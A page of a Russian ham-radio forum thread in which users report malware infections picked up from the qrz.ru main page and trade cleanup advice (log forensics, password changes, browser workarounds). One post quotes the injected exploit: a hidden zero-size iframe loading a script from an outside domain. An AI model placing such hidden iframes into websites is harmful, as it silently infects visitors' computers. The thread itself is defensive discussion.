Страница 14 из 19 ПерваяПервая ... 478910111213141516171819 ПоследняяПоследняя
Показано с 196 по 210 из 278

Тема: Вирусы на qrz.ru

  1. #196
    Standart Power Аватар для UA6XDX
    Регистрация
    26.08.2007
    Адрес
    Нальчик
    Возраст
    63
    Сообщений
    373
    Поблагодарили
    197
    Поблагодарил
    5258
    Если захожу на главную страницу:http://www.qrz.ru/ - Касперский блокирует, если сразу на форум:http://forum.qrz.ru/ - всё нормально.

  2. #197
    Very High Power Аватар для RX3QFY
    Регистрация
    25.03.2009
    Адрес
    Эртиль, Воронежская обл., Россия
    Возраст
    53
    Сообщений
    1,864
    Записей в дневнике
    5
    Поблагодарили
    1015
    Поблагодарил
    682
    Цитата Сообщение от 4Z5LZ / RA9APZ Посмотреть сообщение
    Если требуются конструктивные предложения, то могу могу посоветовать один из методов выявления зараженных страниц (уверен, что 9OTY знает об этом, но может быть будет кому-то ещё полезно).

    Итак, как я вижу, на главной странице qrz.ru до сих пор находится эксплоит < iframe src="http : // trfistc.info /for.cgi?009" width="0" height="0" style="visibility: hidden;" >< /iframe >. Сейчас он бездействует, т.к. адрес указанный выше выдаёт ERROR 403: Forbidden. Поэтому антивирусы прекратили "кричать", хотя в Google видят этот код и не снимают бан с домейна.
    Видать хакеры приостановили свою черную деятельность. Но наверняка временно.

    У меня когда-то были подобные проблемы с коммерческими сайтами. Я сделал следующее. Я не стал сразу удалять вредоносный код, а посмотрел на дату последнего изменения файла в котором находится хакерский код. Если файл не был изменён автором сайта после внедрения эксплоита, то по дате можно искать в логах веб сервера (а также ftp и ssh) кем был внесён этот код. По найденным данным (в частности по IP хакера) можно найти и другие пораженные страницы на сайте и вычистить их.

    Труднее всего найти дырки, через которые хакеры пролезли, и если дыры не найдены, то необходимо поменять пароли к базе данных, ФТП и другим сервисам сайта, а также произвести апдейты программ типа форумов. Как правило, дыры находят в популярных программах с открытым кодом.

    Кстати, надо убрать упоминания о серверных компонентах со страниц сайта. Так например, в HTML можно увидеть
    "Powered by Apache 1.3.33 Unix web server + MySQL 4.1 server"
    Кому это надо? Правильно, хакерам.
    +1
    но...
    боюсь, ФТП будет недостаточно. см. мой коммент выше
    Как раз нет.
    1. Зная полный исходник от этой явно зараженной страницы можно вычленить потом фреймы от рекламы и фреймы от вируса.
    2. НАВЕРНЯКА у кого-то из админов(кроме пользователя той странички) сидит фрейм на компе. Однозначно. У меня его нет, значит есть возможность вычистить через фтп.

  3. #198
    Standart Power Аватар для 4Z5LZ / RA9APZ
    Регистрация
    28.05.2002
    Адрес
    г.Модиин
    Возраст
    49
    Сообщений
    304
    Поблагодарили
    18
    Поблагодарил
    21
    Цитата Сообщение от RX3QFY Посмотреть сообщение
    1. Зная полный исходник от этой явно зараженной страницы можно вычленить потом фреймы от рекламы и фреймы от вируса.
    2. НАВЕРНЯКА у кого-то из админов(кроме пользователя той странички) сидит фрейм на компе. Однозначно. У меня его нет, значит есть возможность вычистить через фтп.
    Сперва надо найти другие зараженные места, а потом уже чистить. Если сделать наоборот, то метка времени файла изменится, и в логах не удастся ничего найти.

  4. #199
    Very High Power Аватар для RX3QFY
    Регистрация
    25.03.2009
    Адрес
    Эртиль, Воронежская обл., Россия
    Возраст
    53
    Сообщений
    1,864
    Записей в дневнике
    5
    Поблагодарили
    1015
    Поблагодарил
    682
    Цитата Сообщение от 4Z5LZ / RA9APZ Посмотреть сообщение
    Сперва надо найти другие зараженные места, а потом уже чистить.
    Коллега! Сначала по фтп находим index-файл(index.php или index.html)
    Потом смотрим дату изменения. записываем ее. и далее обращаем внимание на содержимое файл. ищем фрейм. копируем код в текстовик.
    Если сделать наоборот, то метка времени файла изменится, и в логах не удастся ничего найти.
    После всего вышеперечисленного изменение даты не играет роли.

    Я не навязываюсь, если администрация нуждается в моей помощи - пусть свяжется со мной.

  5. #200
    Very High Power Аватар для RV9CX
    Регистрация
    21.11.2007
    Адрес
    Екатеринбург
    Возраст
    48
    Сообщений
    4,682
    Поблагодарили
    1828
    Поблагодарил
    2226
    Для разрядки
    Изображения Изображения  

  6. #201
    Без подписи Аватар для RQ3P
    Регистрация
    03.05.2007
    Адрес
    Оленино, Россия
    Возраст
    63
    Сообщений
    11,126
    Поблагодарили
    7119
    Поблагодарил
    1977
    Цитата Сообщение от RA9JM Посмотреть сообщение
    А вот вам: "Лучше туда не ходить! :-)))))))))))
    Я ( и куча народу) уже поимели проблемы с баннером сексуального характера!
    Серега Илюхин UA9OTY в отпуске, и видать без него как без рук!
    73! Александр Сухарев RO9O"
    Как баны лепить-так в очередь,а как чистить сайт таки нет никого.....
    Запарился уже диск форматировать . Ничего его не берет-менял антивирусники и браузеры -все равно пролезает.......

  7. #202
    Координатор темы Аватар для RX4HX
    Регистрация
    03.02.2006
    Возраст
    51
    Сообщений
    17,038
    Поблагодарили
    7972
    Поблагодарил
    4164
    Цитата Сообщение от RW3PF Посмотреть сообщение
    Ничего его не берет-менял антивирусники и браузеры -все равно пролезает.......

    Странно вообще. В понедельник вечером на QRZ.ru подцепил вирус-баннер эротического содержания с предложением отправить смс на такой то номер. Пользовался Эксплорером (хоть и знал что не надо))))). Убил вирус - поставил Оперу - все сразу стало ок! Т.е. вирусы все равно лезут, но их антивирусник (у меня Нод32) уже отлавливает.

  8. #203
    Very High Power Аватар для RX3QFY
    Регистрация
    25.03.2009
    Адрес
    Эртиль, Воронежская обл., Россия
    Возраст
    53
    Сообщений
    1,864
    Записей в дневнике
    5
    Поблагодарили
    1015
    Поблагодарил
    682
    Сейчас эксплоит запускает инфицирование в фоновом режиме и если антивирь не запрограммирован на отслеживание фонового режима, то Ваш компьютер инфицируется. Если антивирус работает на такое отслеживание, то после 15-секундного таймаута стартовая страница QRZ.RU виснет в IE7. Обращаю внимание ВСЕХ пользователей, что рекомендую создать закладку в браузере на пряму ссылку форума и ТОЛЬКО ПО НЕЙ проходить на форум. Большая просьба к владельцам персональных страниц - НЕ ОБНОВЛЯЙТЕ пока свой контент. Вы можете заразиться на стартовой странице и потом эту заразу пронести через FTP-доступ во внутрь своего сайта.

  9. #204
    High Power
    Регистрация
    20.07.2008
    Сообщений
    790
    Поблагодарили
    218
    Поблагодарил
    289
    Цитата Сообщение от RX3QFY Посмотреть сообщение
    создать закладку в браузере на пряму ссылку форума и ТОЛЬКО ПО НЕЙ проходить на форум.
    С самого начала так сделано. Может поэтому ничего нет....
    Миниатюры Миниатюры Нажмите на изображение для увеличения. 

Название:	qrz.jpg 
Просмотров:	216 
Размер:	50.2 Кб 
ID:	32666  

  10. #205
    Без подписи Аватар для RQ3P
    Регистрация
    03.05.2007
    Адрес
    Оленино, Россия
    Возраст
    63
    Сообщений
    11,126
    Поблагодарили
    7119
    Поблагодарил
    1977
    Цитата Сообщение от RU4UU Посмотреть сообщение
    С самого начала так сделано. Может поэтому ничего нет....
    А вы на главную сходите-потом расскажите.

  11. #206
    Standart Power
    Регистрация
    10.10.2007
    Сообщений
    414
    Поблагодарили
    90
    Поблагодарил
    11
    Приветствую и сожалею, что заходите с эксплоера на QRZ . Там сейчас сидит троян. Думаю это не зловредный вирус, а "шуточный" , который приводит например к исчезновению Раб.стола (пустой экран) или не работает : Пуск - Выключение - Выключение/Перегрузка (только выключение от сети 220в) или соединяется с имеющимися в компе прежними ссылками на порно сайты (откуда наверное и взят образ трояна).
    Захожу тоже с эксплоера на qrz , но с другого хард-диска (копия основного). На сайте все это время народ шевелится (есть сообщения, немного) , некоторые даже удивляются из-за чего сыр-бор. Рискую так потому, что всегда имею копии на разные даты рабочего хард-диска под рукой, могу перезаписывать хоть каждый вечер чтоб вернуть в вчерашнее состояние без вирусов.
    Рекомендация тем, кто «попал» - HijackThis + Google - как пользоваться.

  12. #207
    Заблокирован
    Регистрация
    15.02.2004
    Адрес
    Ханты-Мансийск
    Возраст
    58
    Сообщений
    1,772
    Поблагодарили
    166
    Поблагодарил
    95
    Цитата Сообщение от RX3QFY Посмотреть сообщение
    Если антивирус работает на такое отслеживание, то после 15-секундного таймаута стартовая страница QRZ.RU виснет в IE7.
    У меня именно так и происходит,потом выскакивает окно отменить исполнение сценария,скрин я выкладавал раньше!После каждого выхода удаляю все куки и т.д!

  13. #208
    Заблокирован
    Регистрация
    15.02.2004
    Адрес
    Ханты-Мансийск
    Возраст
    58
    Сообщений
    1,772
    Поблагодарили
    166
    Поблагодарил
    95

    Wink

    Сегодня утром все в порядке стало,захожу без проблем и блокировки снялись,даже скорость загрузки страниц возросла!Не знаю на долго или нет но надо чтобы всегда так было!
    ------------------------
    Видимо админ дошел до своего рабочего места,ура!
    Миниатюры Миниатюры Нажмите на изображение для увеличения. 

Название:	Сисадминистрирование.jpg 
Просмотров:	140 
Размер:	64.8 Кб 
ID:	32674  

  14. #209
    Модератор Аватар для UN7JID
    Регистрация
    18.05.2007
    Адрес
    Усть-Каменогорск
    Возраст
    47
    Сообщений
    2,278
    Поблагодарили
    1267
    Поблагодарил
    1050
    да, сегодня уже без проблем на форум захожу.С двух разных компов попробовал,два разных антивиря- всё чисто.
    На главной трабл остался.Ругается ещё пока.
    73. Валерий UN7JID!
    Если Вам нечего ответить оппоненту, следует тщательно проверить его сообщение на предмет орфографических и пунктуационных ошибок

  15. #210
    Без позывного Аватар для borman
    Регистрация
    29.08.2007
    Адрес
    Е-бург (Свердловск)
    Возраст
    33
    Сообщений
    228
    Поблагодарили
    13
    Поблагодарил
    21
    Вырубил скрипты и захожу с главной. Три банера с "предупреждением". Но они уже выглядят как часть страницы:
    1. НОВЫЙ РАДИОЛЮБИТЕЛЬСКИЙ РЕФЛЕКТОР "HamBiz", с подпиской
    2. Фрейм - Автоматические антенные тюнеры
    3. Фрейм - Begun Купим рекламу на вашем сайте
    ---------------------
    Это всё баннеры с "дружественных сайтов"?
    P.S. Дальше рыть не стал. Пусть админы пороют.

Социальные закладки

Социальные закладки

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Похоже, что вы используете блокировщик рекламы :(
Форум QRZ.RU существует только за счет рекламы, поэтому мы были бы Вам благодарны если Вы внесете сайт в список исключений!
как отключить
×
Рейтинг@Mail.ru
eXTReMe Tracker


Похоже, что вы используете блокировщик рекламы :(
Форум QRZ.RU существует только за счет рекламы, поэтому мы были бы Вам благодарны если Вы внесете сайт в список исключений!
как отключить
×